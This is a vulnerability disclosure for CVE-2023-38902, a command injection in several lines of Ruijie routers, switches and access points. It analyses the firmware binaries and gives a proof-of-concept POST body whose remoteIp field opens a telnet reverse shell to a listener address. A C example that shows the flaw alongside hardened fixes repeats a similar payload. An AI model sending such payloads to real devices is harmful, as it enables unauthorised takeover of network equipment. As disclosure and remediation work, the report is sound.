@ZIKH26
Last active September 1, 2023 06:25
CVE ruijie report

CVE-ID

CVE-2023-38902

Information

Vendor of the products: Ruijie Networks

Vendor's website: https://www.ruijienetworks.com/

Reported by: Wang Jincheng (wjcwinmt@outlook.com), He Nan (2777256035@qq.com)

Affected products: RG-EW Series Routers and Repeaters, RG-NBS and RG-S1930 Series Switches, RG-EG Series business VPN Routers, RG-EAP and RG-RAP Series Wireless APs, RG-NBC Series Wireless Controllers

Affected firmware version: EW_3.0(1)B11P219, SWITCH_3.0(1)B11P219, EG_3.0(1)B11P219, AP_3.0(1)B11P219, AC_3.0(1)B11P219

Firmware download address: ReyeeOS219

Overview

A command injection vulnerability in RG-EW series routers and repeaters v.EW_3.0(1)B11P219, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P219, RG-EG series business VPN routers v.EG_3.0(1)B11P219, RG-EAP and RG-RAP series wireless access points v.AP_3.0(1)B11P219, and RG-NBC series wireless controllers v.AC_3.0(1)B11P219 allows an authorized attacker to execute arbitrary commands on the affected device by sending a POST request to /cgi-bin/luci/api/cmd whose params.remoteIp field contains shell metacharacters.

Vulnerability details

Analyzing /usr/lib/lua/luci/modules/cmd.lua shows that operation types such as devConfig or devSta and operators such as get or set can be combined arbitrarily into the method field. For instance, selecting the devConfig.get method triggers doParams(params), where params is the JSON object sent in the POST body. The subsequent call to fetch ultimately reaches uf_client_call in /usr/lib/libunifyframe.so, which transmits the data over a socket to /usr/sbin/unifyframe-sgi.elf.

[image: method dispatch in cmd.lua leading to uf_client_call]

In /usr/lib/libunifyframe.so, the value of remoteIp is parsed from a1[5], where a1 is the base address of the JSON data object. Since a1 is of type DWORD* (four-byte elements), a1[5] is the field at byte offset 20 from the object base, which the decompiler displays as *(a1+20) in the receiving binary; that field holds remoteIp.

[image: decompiled libunifyframe.so, remoteIp read from a1[5]]

Within /usr/sbin/unifyframe-sgi.elf there is a command injection. The first %s conversion in the snprintf call that builds the command line receives *(a1+20), i.e. the value of the params.remoteIp field from the POST request. This value is attacker-controlled and is neither validated nor escaped, so when the assembled string is passed to ufm_popen it is interpreted by the shell, and embedded constructs such as $(...) are executed as arbitrary commands.

[image: decompiled unifyframe-sgi.elf, snprintf with *(a1+20) followed by ufm_popen]
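The pattern described above, reduced to a minimal C example added here (this is not Ruijie's code and the real format string in unifyframe-sgi.elf is not reproduced on the page): the vulnerable build of a popen command line from remoteIp, beside a hardened version that accepts only IP literals and, preferably, never goes through a shell at all. The command template, the helper names and the sample values are assumptions for illustration.

```c
/*
 * Added example (not from the original report or the vendor's firmware):
 * snprintf-into-popen command injection and two hardened alternatives.
 * CMD_FMT and the helper names are constructed assumptions.
 */
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical command template standing in for the real one. */
#define CMD_FMT "some_tool --remote %s"

/* Vulnerable: the untrusted remoteIp value is spliced straight into a
 * command line that will be handed to /bin/sh -c by popen(). */
int build_cmd_vulnerable(char *out, size_t outlen, const char *remote_ip)
{
    return snprintf(out, outlen, CMD_FMT, remote_ip);
}

/* Returns 1 if s is a well-formed IPv4 or IPv6 literal, 0 otherwise.
 * inet_pton() rejects whitespace, ';', '|', '$(' and every other shell
 * metacharacter, so an allowlist by format is enough here. */
int is_ip_literal(const char *s)
{
    unsigned char buf[16];
    return inet_pton(AF_INET, s, buf) == 1 || inet_pton(AF_INET6, s, buf) == 1;
}

/* Hardened (minimal change): validate before formatting, and fail on
 * truncation. Returns 0 on success, -1 if the value is rejected. */
int build_cmd_hardened(char *out, size_t outlen, const char *remote_ip)
{
    if (!is_ip_literal(remote_ip))
        return -1;
    int n = snprintf(out, outlen, CMD_FMT, remote_ip);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return 0;
}

/* Preferred: build an argv vector for execvp() instead of a string for
 * popen(). With no shell involved, "$(...)", ";" and "|" are plain bytes
 * in a single argument. argv must have room for 4 entries. */
int build_argv_hardened(const char *remote_ip, const char *argv[4])
{
    if (!is_ip_literal(remote_ip))
        return -1;
    argv[0] = "some_tool";
    argv[1] = "--remote";
    argv[2] = remote_ip;
    argv[3] = NULL;
    return 0;
}

int main(void)
{
    /* Constructed payload in the shape of the report's PoC. */
    const char *payload = "$(mkfifo /tmp/t;telnet 192.0.2.1 6666 0</tmp/t|/bin/sh >/tmp/t)";
    char cmd[256];

    build_cmd_vulnerable(cmd, sizeof cmd, payload);
    printf("vulnerable command line: %s\n", cmd);

    printf("hardened result for payload: %d\n",
           build_cmd_hardened(cmd, sizeof cmd, payload));
    if (build_cmd_hardened(cmd, sizeof cmd, "192.0.2.1") == 0)
        printf("hardened command line:   %s\n", cmd);
    return 0;
}
```

The allowlist is deliberately strict: a device-side remote IP parameter has no legitimate reason to contain anything inet_pton() rejects. If the real call site needs hostnames as well, validate against a hostname grammar rather than trying to escape shell metacharacters, and still prefer the argv form so the shell never parses attacker input.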

PoC

As an authorized user, send the following JSON body in a POST request to /cgi-bin/luci/api/cmd. The remoteIp value is executed by the device's shell and here opens a reverse shell to the listed listener address and port.

{
    "method": "devConfig.get",
    "params": {
        "module": "123",
        "remoteIp": "$(mkfifo /tmp/test;telnet 192.168.45.203 6666 0</tmp/test|/bin/sh > /tmp/test)",
        "data": {
            "kkk": "abc"
        }
    }
}

Attack Demonstration

[image: attack demonstration, reverse shell obtained from the device]
